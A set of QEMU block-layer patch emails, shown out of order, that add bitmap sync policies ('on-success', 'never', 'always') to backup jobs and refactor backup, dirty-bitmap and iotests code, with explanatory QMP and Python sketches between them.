 /* Detect image-fleecing (and similar) schemes */
diff --git a/block/mirror.c b/block/mirror.c
index d17be4cdbc..42b3d9acd0 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -1717,8 +1717,10 @@ void mirror_start(const char *job_id, BlockDriverState 
*bs,
 bool is_none_mode;
 BlockDriverState *base;
 
-if (mode == MIRROR_SYNC_MODE_INCREMENTAL) {
-error_setg(errp, "Sync mode 'incremental' not supported");
+if ((mode == MIRROR_SYNC_MODE_INCREMENTAL) ||
+(mode == MIRROR_SYNC_MODE_BITMAP)) {
+error_setg(errp, "Sync mode '%s' not supported",
+   MirrorSyncMode_str(mode));
 return;
 }
 is_none_mode = mode == MIRROR_SYNC_MODE_NONE;
diff --git a/block/replication.c b/block/replication.c
index b41bc507c0..5475217c69 100644
--- a/block/replication.c
+++ b/block/replication.c
@@ -543,7 +543,7 @@ static void replication_start(ReplicationState *rs, 
ReplicationMode mode,
 
 s->backup_job = backup_job_create(
 NULL, s->secondary_disk->bs, 
s->hidden_disk->bs,
-0, MIRROR_SYNC_MODE_NONE, NULL, false,
+0, MIRROR_SYNC_MODE_NONE, NULL, 0, false,
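How the new mode is expected to be driven over QMP (a sketch: it assumes the
BitmapSyncMode argument is exposed as 'bitmap-mode', and that 'drive0',
'target0' and bitmap 'bitmap0' already exist):

    vm.qmp_log('blockdev-backup',
               job_id='backup0',
               device='drive0',
               target='target0',
               sync='bitmap',              # new MirrorSyncMode value
               bitmap='bitmap0',
               bitmap_mode='on-success')   # behaves like the old 'incremental'

    # The old spelling remains valid and becomes sugar for the call above:
    vm.qmp_log('blockdev-backup', job_id='backup1', device='drive0',
               target='target0', sync='incremental', bitmap='bitmap0')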
 

[Qemu-block] [PATCH v3 13/18] iotests: add testing shim for script-style python tests

2019-07-05 Thread John Snow
Because the new-style python tests don't use the iotests.main() test
launcher, we don't turn on the debugger logging for these scripts
when invoked via ./check -d.

Refactor the launcher shim into new and old style shims so that they
share environmental configuration.

Two cleanup notes: 'debug' was not actually used as a global, and there
was no reason to create a class in an inner scope just to set default
arguments; we can simply create an instance of the runner with the
values we want instead.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 40 +++
 1 file changed, 26 insertions(+), 14 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index 3ecef5bc90..fcad957d63 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -61,7 +61,6 @@ cachemode = os.environ.get('CACHEMODE')
 qemu_default_machine = os.environ.get('QEMU_DEFAULT_MACHINE')
 
 socket_scm_helper = os.environ.get('SOCKET_SCM_HELPER', 'socket_scm_helper')
-debug = False
 
 luks_default_secret_object = 'secret,id=keysec0,data=' + \
  os.environ.get('IMGKEYSECRET', '')
@@ -834,11 +833,22 @@ def skip_if_unsupported(required_formats=[], 
read_only=False):
 return func_wrapper
 return skip_test_decorator
 
-def main(supported_fmts=[], supported_oses=['linux'], supported_cache_modes=[],
- unsupported_fmts=[]):
-'''Run tests'''
+def execute_unittest(output, verbosity, debug):
+runner = unittest.TextTestRunner(stream=output, descriptions=True,
+ verbosity=verbosity)
+try:
+# unittest.main() will use sys.exit(); so expect a SystemExit
+# exception
+unittest.main(testRunner=runner)
+finally:
+if not debug:
+sys.stderr.write(re.sub(r'Ran (\d+) tests? in [\d.]+s',
+r'Ran \1 tests', output.getvalue()))
 
-global debug
+def execute_test(test_function=None,
+ supported_fmts=[], supported_oses=['linux'],
+ supported_cache_modes=[], unsupported_fmts=[]):
+"""Run either unittest or script-style tests."""
 
 # We are using TEST_DIR and QEMU_DEFAULT_MACHINE as proxies to
 # indicate that we're not being run via "check". There may be
@@ -870,13 +880,15 @@ def main(supported_fmts=[], supported_oses=['linux'], 
supported_cache_modes=[],
 
 logging.basicConfig(level=(logging.DEBUG if debug else logging.WARN))
 
-class MyTestRunner(unittest.TextTestRunner):
-def __init__(self, stream=output, descriptions=True, 
verbosity=verbosity):
-unittest.TextTestRunner.__init__(self, stream, descriptions, 
verbosity)
+if not test_function:
+execute_unittest(output, verbosity, debug)
+else:
+test_function()
 
-# unittest.main() will use sys.exit() so expect a SystemExit exception
-try:
-unittest.main(testRunner=MyTestRunner)
-finally:
-if not debug:
-sys.stderr.write(re.sub(r'Ran (\d+) tests? in [\d.]+s', r'Ran \1 
tests', output.getvalue()))
+def script_main(test_function, *args, **kwargs):
+"""Run script-style tests outside of the unittest framework"""
+execute_test(test_function, *args, **kwargs)
+
+def main(*args, **kwargs):
+"""Run tests using the unittest framework"""
+execute_test(None, *args, **kwargs)
-- 
2.21.0
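A script-style test can now opt into the same environment checks and debug
handling as the unittest-style tests (minimal sketch):

    import iotests
    from iotests import log

    def test_body():
        log('runs with ./check -d debug handling provided by the shim')

    if __name__ == '__main__':
        iotests.script_main(test_body, supported_fmts=['qcow2'])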




[Qemu-block] [PATCH v3 11/18] block/backup: upgrade copy_bitmap to BdrvDirtyBitmap

2019-07-05 Thread John Snow
This simplifies some interface matters, namely the initialization and,
later, the merging of the copy manifest back into the sync_bitmap if one
was provided.

Signed-off-by: John Snow 
---
 block/backup.c | 81 ++
 1 file changed, 42 insertions(+), 39 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index efd0dcd2e7..3c08d057cc 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -38,7 +38,10 @@ typedef struct CowRequest {
 typedef struct BackupBlockJob {
 BlockJob common;
 BlockBackend *target;
+
 BdrvDirtyBitmap *sync_bitmap;
+BdrvDirtyBitmap *copy_bitmap;
+
 MirrorSyncMode sync_mode;
 BitmapSyncMode bitmap_mode;
 BlockdevOnError on_source_error;
@@ -51,7 +54,6 @@ typedef struct BackupBlockJob {
 NotifierWithReturn before_write;
 QLIST_HEAD(, CowRequest) inflight_reqs;
 
-HBitmap *copy_bitmap;
 bool use_copy_range;
 int64_t copy_range_size;
 
@@ -113,7 +115,7 @@ static int coroutine_fn 
backup_cow_with_bounce_buffer(BackupBlockJob *job,
 int write_flags = job->serialize_target_writes ? BDRV_REQ_SERIALISING : 0;
 
 assert(QEMU_IS_ALIGNED(start, job->cluster_size));
-hbitmap_reset(job->copy_bitmap, start, job->cluster_size);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, start, job->cluster_size);
 nbytes = MIN(job->cluster_size, job->len - start);
 if (!*bounce_buffer) {
 *bounce_buffer = blk_blockalign(blk, job->cluster_size);
@@ -146,7 +148,7 @@ static int coroutine_fn 
backup_cow_with_bounce_buffer(BackupBlockJob *job,
 
 return nbytes;
 fail:
-hbitmap_set(job->copy_bitmap, start, job->cluster_size);
+bdrv_set_dirty_bitmap(job->copy_bitmap, start, job->cluster_size);
 return ret;
 
 }
@@ -169,12 +171,14 @@ static int coroutine_fn 
backup_cow_with_offload(BackupBlockJob *job,
 assert(QEMU_IS_ALIGNED(start, job->cluster_size));
 nbytes = MIN(job->copy_range_size, end - start);
 nr_clusters = DIV_ROUND_UP(nbytes, job->cluster_size);
-hbitmap_reset(job->copy_bitmap, start, job->cluster_size * nr_clusters);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, start,
+job->cluster_size * nr_clusters);
 ret = blk_co_copy_range(blk, start, job->target, start, nbytes,
 read_flags, write_flags);
 if (ret < 0) {
 trace_backup_do_cow_copy_range_fail(job, start, ret);
-hbitmap_set(job->copy_bitmap, start, job->cluster_size * nr_clusters);
+bdrv_set_dirty_bitmap(job->copy_bitmap, start,
+  job->cluster_size * nr_clusters);
 return ret;
 }
 
@@ -202,7 +206,7 @@ static int coroutine_fn backup_do_cow(BackupBlockJob *job,
 cow_request_begin(&cow_request, job, start, end);
 
 while (start < end) {
-if (!hbitmap_get(job->copy_bitmap, start)) {
+if (!bdrv_dirty_bitmap_get(job->copy_bitmap, start)) {
 trace_backup_do_cow_skip(job, start);
 start += job->cluster_size;
 continue; /* already copied */
@@ -298,14 +302,16 @@ static void backup_abort(Job *job)
 static void backup_clean(Job *job)
 {
 BackupBlockJob *s = container_of(job, BackupBlockJob, common.job);
+BlockDriverState *target_bs = blk_bs(s->target);
+
+if (s->copy_bitmap) {
+bdrv_release_dirty_bitmap(target_bs, s->copy_bitmap);
+s->copy_bitmap = NULL;
+}
+
 assert(s->target);
 blk_unref(s->target);
 s->target = NULL;
-
-if (s->copy_bitmap) {
-hbitmap_free(s->copy_bitmap);
-s->copy_bitmap = NULL;
-}
 }
 
 void backup_do_checkpoint(BlockJob *job, Error **errp)
@@ -320,7 +326,7 @@ void backup_do_checkpoint(BlockJob *job, Error **errp)
 return;
 }
 
-hbitmap_set(backup_job->copy_bitmap, 0, backup_job->len);
+bdrv_set_dirty_bitmap(backup_job->copy_bitmap, 0, backup_job->len);
 }
 
 static void backup_drain(BlockJob *job)
@@ -389,59 +395,52 @@ static bool bdrv_is_unallocated_range(BlockDriverState 
*bs,
 
 static int coroutine_fn backup_loop(BackupBlockJob *job)
 {
-int ret;
 bool error_is_read;
 int64_t offset;
-HBitmapIter hbi;
+BdrvDirtyBitmapIter *bdbi;
 BlockDriverState *bs = blk_bs(job->common.blk);
+int ret = 0;
 
-hbitmap_iter_init(&hbi, job->copy_bitmap, 0);
-while ((offset = hbitmap_iter_next(&hbi)) != -1) {
+bdbi = bdrv_dirty_iter_new(job->copy_bitmap);
+while ((offset = bdrv_dirty_iter_next(bdbi)) != -1) {
 if (job->sync_mode == MIRROR_SYNC_MODE_TOP &&
 bdrv_is_unallocated_range(bs, offset, job->cluster_size))
 {
-hbitmap_reset(job->copy_bitmap, offset, job->cluster_size);
+bdrv_reset_dirty_bitmap(job->copy_bitmap, offset,
+job->cluster_size);
 continue;
 }
 
 do {
 if (yield_and_check(job)) {
-return 0;
+goto out;
 }
 ret = 

[Qemu-block] [PATCH v3 10/18] block/dirty-bitmap: add bdrv_dirty_bitmap_get

2019-07-05 Thread John Snow
Add a public interface for get. While we're at it,
rename "bdrv_get_dirty_bitmap_locked" to "bdrv_dirty_bitmap_get_locked".

(There are more functions to rename to the bdrv_dirty_bitmap_VERB form,
but they will wait until the conclusion of this series.)

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 block/dirty-bitmap.c | 19 ---
 block/mirror.c   |  2 +-
 include/block/dirty-bitmap.h |  4 ++--
 migration/block.c|  5 ++---
 nbd/server.c |  2 +-
 5 files changed, 18 insertions(+), 14 deletions(-)

diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
index c5b66ae9ed..af8d7486db 100644
--- a/block/dirty-bitmap.c
+++ b/block/dirty-bitmap.c
@@ -509,14 +509,19 @@ BlockDirtyInfoList 
*bdrv_query_dirty_bitmaps(BlockDriverState *bs)
 }
 
 /* Called within bdrv_dirty_bitmap_lock..unlock */
-bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
-   int64_t offset)
+bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset)
 {
-if (bitmap) {
-return hbitmap_get(bitmap->bitmap, offset);
-} else {
-return false;
-}
+return hbitmap_get(bitmap->bitmap, offset);
+}
+
+bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset)
+{
+bool ret;
+bdrv_dirty_bitmap_lock(bitmap);
+ret = bdrv_dirty_bitmap_get_locked(bitmap, offset);
+bdrv_dirty_bitmap_unlock(bitmap);
+
+return ret;
 }
 
 /**
diff --git a/block/mirror.c b/block/mirror.c
index 42b3d9acd0..1da57409f0 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -476,7 +476,7 @@ static uint64_t coroutine_fn 
mirror_iteration(MirrorBlockJob *s)
 int64_t next_offset = offset + nb_chunks * s->granularity;
 int64_t next_chunk = next_offset / s->granularity;
 if (next_offset >= s->bdev_length ||
-!bdrv_get_dirty_locked(source, s->dirty_bitmap, next_offset)) {
+!bdrv_dirty_bitmap_get_locked(s->dirty_bitmap, next_offset)) {
 break;
 }
 if (test_bit(next_chunk, s->in_flight_bitmap)) {
diff --git a/include/block/dirty-bitmap.h b/include/block/dirty-bitmap.h
index 62682eb865..0120ef3f05 100644
--- a/include/block/dirty-bitmap.h
+++ b/include/block/dirty-bitmap.h
@@ -84,12 +84,12 @@ void bdrv_dirty_bitmap_set_busy(BdrvDirtyBitmap *bitmap, 
bool busy);
 void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap *src,
  HBitmap **backup, Error **errp);
 void bdrv_dirty_bitmap_set_migration(BdrvDirtyBitmap *bitmap, bool migration);
+bool bdrv_dirty_bitmap_get(BdrvDirtyBitmap *bitmap, int64_t offset);
 
 /* Functions that require manual locking.  */
 void bdrv_dirty_bitmap_lock(BdrvDirtyBitmap *bitmap);
 void bdrv_dirty_bitmap_unlock(BdrvDirtyBitmap *bitmap);
-bool bdrv_get_dirty_locked(BlockDriverState *bs, BdrvDirtyBitmap *bitmap,
-   int64_t offset);
+bool bdrv_dirty_bitmap_get_locked(BdrvDirtyBitmap *bitmap, int64_t offset);
 void bdrv_set_dirty_bitmap_locked(BdrvDirtyBitmap *bitmap,
   int64_t offset, int64_t bytes);
 void bdrv_reset_dirty_bitmap_locked(BdrvDirtyBitmap *bitmap,
diff --git a/migration/block.c b/migration/block.c
index 91f98ef44a..a5b60456ae 100644
--- a/migration/block.c
+++ b/migration/block.c
@@ -520,7 +520,6 @@ static int mig_save_device_dirty(QEMUFile *f, 
BlkMigDevState *bmds,
  int is_async)
 {
 BlkMigBlock *blk;
-BlockDriverState *bs = blk_bs(bmds->blk);
 int64_t total_sectors = bmds->total_sectors;
 int64_t sector;
 int nr_sectors;
@@ -535,8 +534,8 @@ static int mig_save_device_dirty(QEMUFile *f, 
BlkMigDevState *bmds,
 blk_mig_unlock();
 }
 bdrv_dirty_bitmap_lock(bmds->dirty_bitmap);
-if (bdrv_get_dirty_locked(bs, bmds->dirty_bitmap,
-  sector * BDRV_SECTOR_SIZE)) {
+if (bdrv_dirty_bitmap_get_locked(bmds->dirty_bitmap,
+ sector * BDRV_SECTOR_SIZE)) {
 if (total_sectors - sector < BDRV_SECTORS_PER_DIRTY_CHUNK) {
 nr_sectors = total_sectors - sector;
 } else {
diff --git a/nbd/server.c b/nbd/server.c
index 10faedcfc5..fbd51b48a7 100644
--- a/nbd/server.c
+++ b/nbd/server.c
@@ -2003,7 +2003,7 @@ static unsigned int bitmap_to_extents(BdrvDirtyBitmap 
*bitmap, uint64_t offset,
 bdrv_dirty_bitmap_lock(bitmap);
 
 it = bdrv_dirty_iter_new(bitmap);
-dirty = bdrv_get_dirty_locked(NULL, bitmap, offset);
+dirty = bdrv_dirty_bitmap_get_locked(bitmap, offset);
 
 assert(begin < overall_end && nb_extents);
 while (begin < overall_end && i < nb_extents) {
-- 
2.21.0




[Qemu-block] [PATCH v3 12/18] block/backup: add 'always' bitmap sync policy

2019-07-05 Thread John Snow
This adds an "always" policy for bitmap synchronization. Regardless of whether
the job succeeds or fails, the bitmap is *always* synchronized. This means
that for backups that fail part-way through, the bitmap retains a record of
which sectors still need to be copied out to complete a new backup using the
old, partial result.

In effect, this allows us to "resume" a failed backup; however, the new backup
will be from the new point in time, so it isn't a "resume" as much as it is
an "incremental retry." This can be useful for extremely large backups that
fail a considerable way through the operation, where we'd like not to waste
the work that was already performed.

Signed-off-by: John Snow 
---
 block/backup.c   | 27 +++
 qapi/block-core.json |  5 -
 2 files changed, 23 insertions(+), 9 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 3c08d057cc..b25e6179cf 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -268,18 +268,29 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
*job, int ret)
 {
 BdrvDirtyBitmap *bm;
 BlockDriverState *bs = blk_bs(job->common.blk);
+bool sync = (((ret == 0) || (job->bitmap_mode == BITMAP_SYNC_MODE_ALWAYS)) \
+ && (job->bitmap_mode != BITMAP_SYNC_MODE_NEVER));
 
-if (ret < 0 || job->bitmap_mode == BITMAP_SYNC_MODE_NEVER) {
+if (sync) {
 /*
- * Failure, or we don't want to synchronize the bitmap.
- * Merge the successor back into the parent, delete nothing.
+ * We succeeded, or we always intended to sync the bitmap.
+ * Delete this bitmap and install the child.
  */
-bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
-assert(bm);
-} else {
-/* Everything is fine, delete this bitmap and install the backup. */
 bm = bdrv_dirty_bitmap_abdicate(bs, job->sync_bitmap, NULL);
-assert(bm);
+} else {
+/*
+ * We failed, or we never intended to sync the bitmap anyway.
+ * Merge the successor back into the parent, keeping all data.
+ */
+bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
+}
+
+assert(bm);
+
+if (ret < 0 && job->bitmap_mode == BITMAP_SYNC_MODE_ALWAYS) {
+/* If we failed and synced, merge in the bits we didn't copy: */
+bdrv_dirty_bitmap_merge_internal(bm, job->copy_bitmap,
+ NULL, true);
 }
 }
 
diff --git a/qapi/block-core.json b/qapi/block-core.json
index b1a98e..5a578806c5 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1149,10 +1149,13 @@
 # @never: The bitmap is never synchronized with the operation, and is
 # treated solely as a read-only manifest of blocks to copy.
 #
+# @always: The bitmap is always synchronized with the operation,
+#  regardless of whether or not the operation was successful.
+#
 # Since: 4.2
 ##
 { 'enum': 'BitmapSyncMode',
-  'data': ['on-success', 'never'] }
+  'data': ['on-success', 'never', 'always'] }
 
 ##
 # @MirrorCopyMode:
-- 
2.21.0
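A pure-Python model of the cleanup logic above (illustrative, not QEMU code):
'bits' are cluster indices, and on a failed 'always' job the bits that were
never copied are merged back so that the next backup picks them up.

    def cleanup_sync_bitmap(sync_bitmap, uncopied, bitmap_mode, ret):
        sync = (ret == 0 or bitmap_mode == 'always') and bitmap_mode != 'never'
        if sync:
            # adopt the successor (writes made while the job ran)
            new_bits = set(sync_bitmap['successor'])
            if ret < 0 and bitmap_mode == 'always':
                # merge in everything we did not manage to copy out
                new_bits |= uncopied
            sync_bitmap['bits'] = new_bits
        else:
            # failure (or 'never'): fold the successor back, keep all old bits
            sync_bitmap['bits'] |= sync_bitmap['successor']
        sync_bitmap['successor'] = set()

    bmap = {'bits': {1, 2, 3}, 'successor': {9}}   # 9 was written during the job
    remaining = {2, 3}                             # clusters not yet copied at failure
    cleanup_sync_bitmap(bmap, remaining, 'always', ret=-5)
    assert bmap['bits'] == {2, 3, 9}               # cluster 1 was copied; drop it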




[Qemu-block] [PATCH v3 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread John Snow
Depending on what a user is trying to accomplish, there are a few
different bitmap cleanup actions that could be useful once an operation
has finished.

I am proposing three:
- NEVER: The bitmap is never synchronized against what was copied.
- ALWAYS: The bitmap is always synchronized, even on failures.
- ON-SUCCESS: The bitmap is synchronized only on success.

The existing incremental backup modes use 'on-success' semantics,
so add just that one for right now.

Signed-off-by: John Snow 
---
 qapi/block-core.json | 14 ++
 1 file changed, 14 insertions(+)

diff --git a/qapi/block-core.json b/qapi/block-core.json
index 0af3866015..0c853d00bd 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1134,6 +1134,20 @@
 { 'enum': 'MirrorSyncMode',
   'data': ['top', 'full', 'none', 'incremental'] }
 
+##
+# @BitmapSyncMode:
+#
+# An enumeration of possible behaviors for the synchronization of a bitmap
+# when used for data copy operations.
+#
+# @on-success: The bitmap is only synced when the operation is successful.
+#  This is the behavior always used for 'INCREMENTAL' backups.
+#
+# Since: 4.2
+##
+{ 'enum': 'BitmapSyncMode',
+  'data': ['on-success'] }
+
 ##
 # @MirrorCopyMode:
 #
-- 
2.21.0




[Qemu-block] [PATCH v3 06/18] block/backup: add 'never' policy to bitmap sync mode

2019-07-05 Thread John Snow
This adds a "never" policy for bitmap synchronization. Regardless of whether
the job succeeds or fails, we never update the bitmap. This can be used
to perform differential backups, or simply to avoid the job modifying a
bitmap.

Signed-off-by: John Snow 
---
 block/backup.c   | 7 +--
 qapi/block-core.json | 5 -
 2 files changed, 9 insertions(+), 3 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 996941fa61..efd0dcd2e7 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -265,8 +265,11 @@ static void backup_cleanup_sync_bitmap(BackupBlockJob 
*job, int ret)
 BdrvDirtyBitmap *bm;
 BlockDriverState *bs = blk_bs(job->common.blk);
 
-if (ret < 0) {
-/* Merge the successor back into the parent, delete nothing. */
+if (ret < 0 || job->bitmap_mode == BITMAP_SYNC_MODE_NEVER) {
+/*
+ * Failure, or we don't want to synchronize the bitmap.
+ * Merge the successor back into the parent, delete nothing.
+ */
 bm = bdrv_reclaim_dirty_bitmap(bs, job->sync_bitmap, NULL);
 assert(bm);
 } else {
diff --git a/qapi/block-core.json b/qapi/block-core.json
index 99dcd5f099..b1a98e 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1146,10 +1146,13 @@
 # @on-success: The bitmap is only synced when the operation is successful.
 #  This is the behavior always used for 'INCREMENTAL' backups.
 #
+# @never: The bitmap is never synchronized with the operation, and is
+# treated solely as a read-only manifest of blocks to copy.
+#
 # Since: 4.2
 ##
 { 'enum': 'BitmapSyncMode',
-  'data': ['on-success'] }
+  'data': ['on-success', 'never'] }
 
 ##
 # @MirrorCopyMode:
-- 
2.21.0
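Differential backups driven over QMP might look like this (sketch: it assumes
the BitmapSyncMode argument is exposed as 'bitmap-mode' and that the drive,
bitmap and target nodes already exist). Because the bitmap is never cleared,
each backup contains everything dirtied since the bitmap was created:

    vm.qmp_log('blockdev-backup', job_id='diff1', device='drive0',
               target='target1', sync='bitmap', bitmap='bitmap0',
               bitmap_mode='never')
    # ... wait for diff1, let the guest write more data ...
    vm.qmp_log('blockdev-backup', job_id='diff2', device='drive0',
               target='target2', sync='bitmap', bitmap='bitmap0',
               bitmap_mode='never')
    # diff2 includes every cluster dirtied since bitmap0 was created,
    # including those already captured by diff1.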




[Qemu-block] [PATCH v3 07/18] hbitmap: Fix merge when b is empty, and result is not an alias of a

2019-07-05 Thread John Snow
Nobody calls the function like this currently, but we neither prohibit
nor cope with this behavior. I decided to make the function cope with it.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 util/hbitmap.c | 13 ++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/util/hbitmap.c b/util/hbitmap.c
index 7905212a8b..3b6acae42b 100644
--- a/util/hbitmap.c
+++ b/util/hbitmap.c
@@ -781,8 +781,9 @@ bool hbitmap_can_merge(const HBitmap *a, const HBitmap *b)
 }
 
 /**
- * Given HBitmaps A and B, let A := A (BITOR) B.
- * Bitmap B will not be modified.
+ * Given HBitmaps A and B, let R := A (BITOR) B.
+ * Bitmaps A and B will not be modified,
+ * except when bitmap R is an alias of A or B.
  *
  * @return true if the merge was successful,
  * false if it was not attempted.
@@ -797,7 +798,13 @@ bool hbitmap_merge(const HBitmap *a, const HBitmap *b, 
HBitmap *result)
 }
 assert(hbitmap_can_merge(b, result));
 
-if (hbitmap_count(b) == 0) {
+if ((!hbitmap_count(a) && result == b) ||
+(!hbitmap_count(b) && result == a)) {
+return true;
+}
+
+if (!hbitmap_count(a) && !hbitmap_count(b)) {
+hbitmap_reset_all(result);
 return true;
 }
 
-- 
2.21.0
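The merge contract in miniature, with a pure-Python stand-in for HBitmap
(result := a | b, where result may be a distinct, previously-used bitmap);
the two asserts exercise exactly the cases this patch is about:

    def merge(a, b, result):
        if not a and result is b:
            return            # b already holds a | b
        if not b and result is a:
            return            # a already holds a | b
        if not a and not b:
            result.clear()    # stale contents must not leak into the result
            return
        union = a | b
        result.clear()
        result.update(union)

    result = {1, 2, 3}          # stale leftovers from an earlier merge
    merge(set(), set(), result)
    assert result == set()      # both inputs empty: result must be reset

    result = set()
    merge({4, 5}, set(), result)
    assert result == {4, 5}     # b empty, but result is not an alias of a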




[Qemu-block] [PATCH v3 02/18] drive-backup: create do_backup_common

2019-07-05 Thread John Snow
Create a common core that comprises the actual meat of what the backup API
boundary needs to do, and then switch drive-backup to use it.

Signed-off-by: John Snow 
---
 blockdev.c | 122 +
 1 file changed, 67 insertions(+), 55 deletions(-)

diff --git a/blockdev.c b/blockdev.c
index 4d141e9a1f..5bc8ecd087 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3425,6 +3425,70 @@ out:
 aio_context_release(aio_context);
 }
 
+/* Common QMP interface for drive-backup and blockdev-backup */
+static BlockJob *do_backup_common(BackupCommon *backup,
+  BlockDriverState *bs,
+  BlockDriverState *target_bs,
+  AioContext *aio_context,
+  JobTxn *txn, Error **errp)
+{
+BlockJob *job = NULL;
+BdrvDirtyBitmap *bmap = NULL;
+int job_flags = JOB_DEFAULT;
+int ret;
+
+if (!backup->has_speed) {
+backup->speed = 0;
+}
+if (!backup->has_on_source_error) {
+backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
+}
+if (!backup->has_on_target_error) {
+backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
+}
+if (!backup->has_job_id) {
+backup->job_id = NULL;
+}
+if (!backup->has_auto_finalize) {
+backup->auto_finalize = true;
+}
+if (!backup->has_auto_dismiss) {
+backup->auto_dismiss = true;
+}
+if (!backup->has_compress) {
+backup->compress = false;
+}
+
+ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
+if (ret < 0) {
+return NULL;
+}
+
+if (backup->has_bitmap) {
+bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
+if (!bmap) {
+error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
+return NULL;
+}
+if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
+return NULL;
+}
+}
+
+if (!backup->auto_finalize) {
+job_flags |= JOB_MANUAL_FINALIZE;
+}
+if (!backup->auto_dismiss) {
+job_flags |= JOB_MANUAL_DISMISS;
+}
+
+job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
+backup->sync, bmap, backup->compress,
+backup->on_source_error, backup->on_target_error,
+job_flags, NULL, NULL, txn, errp);
+return job;
+}
+
 static BlockJob *do_drive_backup(DriveBackup *backup, JobTxn *txn,
  Error **errp)
 {
@@ -3432,39 +3496,16 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 BlockDriverState *target_bs;
 BlockDriverState *source = NULL;
 BlockJob *job = NULL;
-BdrvDirtyBitmap *bmap = NULL;
 AioContext *aio_context;
 QDict *options = NULL;
 Error *local_err = NULL;
-int flags, job_flags = JOB_DEFAULT;
+int flags;
 int64_t size;
 bool set_backing_hd = false;
-int ret;
 
-if (!backup->has_speed) {
-backup->speed = 0;
-}
-if (!backup->has_on_source_error) {
-backup->on_source_error = BLOCKDEV_ON_ERROR_REPORT;
-}
-if (!backup->has_on_target_error) {
-backup->on_target_error = BLOCKDEV_ON_ERROR_REPORT;
-}
 if (!backup->has_mode) {
 backup->mode = NEW_IMAGE_MODE_ABSOLUTE_PATHS;
 }
-if (!backup->has_job_id) {
-backup->job_id = NULL;
-}
-if (!backup->has_auto_finalize) {
-backup->auto_finalize = true;
-}
-if (!backup->has_auto_dismiss) {
-backup->auto_dismiss = true;
-}
-if (!backup->has_compress) {
-backup->compress = false;
-}
 
 bs = bdrv_lookup_bs(backup->device, backup->device, errp);
 if (!bs) {
@@ -3541,12 +3582,6 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 goto out;
 }
 
-ret = bdrv_try_set_aio_context(target_bs, aio_context, errp);
-if (ret < 0) {
-bdrv_unref(target_bs);
-goto out;
-}
-
 if (set_backing_hd) {
 bdrv_set_backing_hd(target_bs, source, &local_err);
 if (local_err) {
@@ -3554,31 +3589,8 @@ static BlockJob *do_drive_backup(DriveBackup *backup, 
JobTxn *txn,
 }
 }
 
-if (backup->has_bitmap) {
-bmap = bdrv_find_dirty_bitmap(bs, backup->bitmap);
-if (!bmap) {
-error_setg(errp, "Bitmap '%s' could not be found", backup->bitmap);
-goto unref;
-}
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
-goto unref;
-}
-}
-if (!backup->auto_finalize) {
-job_flags |= JOB_MANUAL_FINALIZE;
-}
-if (!backup->auto_dismiss) {
-job_flags |= JOB_MANUAL_DISMISS;
-}
-
-job = backup_job_create(backup->job_id, bs, target_bs, backup->speed,
-backup->sync, bmap, backup->compress,
-  

[Qemu-block] [PATCH v3 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread John Snow
drive-backup and blockdev-backup have an awful lot of things in common.
Let's deduplicate them.

I don't deduplicate 'target', because the semantics actually did change
between each structure. Leave that one alone so it can be documented
separately.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 qapi/block-core.json | 103 ++-
 1 file changed, 33 insertions(+), 70 deletions(-)

diff --git a/qapi/block-core.json b/qapi/block-core.json
index 0d43d4f37c..0af3866015 100644
--- a/qapi/block-core.json
+++ b/qapi/block-core.json
@@ -1315,32 +1315,23 @@
   'data': { 'node': 'str', 'overlay': 'str' } }
 
 ##
-# @DriveBackup:
+# @BackupCommon:
 #
 # @job-id: identifier for the newly-created block job. If
 #  omitted, the device name will be used. (Since 2.7)
 #
 # @device: the device name or node-name of a root node which should be copied.
 #
-# @target: the target of the new image. If the file exists, or if it
-#  is a device, the existing file/device will be used as the new
-#  destination.  If it does not exist, a new file will be created.
-#
-# @format: the format of the new destination, default is to
-#  probe if @mode is 'existing', else the format of the source
-#
 # @sync: what parts of the disk image should be copied to the destination
 #(all the disk, only the sectors allocated in the topmost image, from a
 #dirty bitmap, or only new I/O).
 #
-# @mode: whether and how QEMU should create a new image, default is
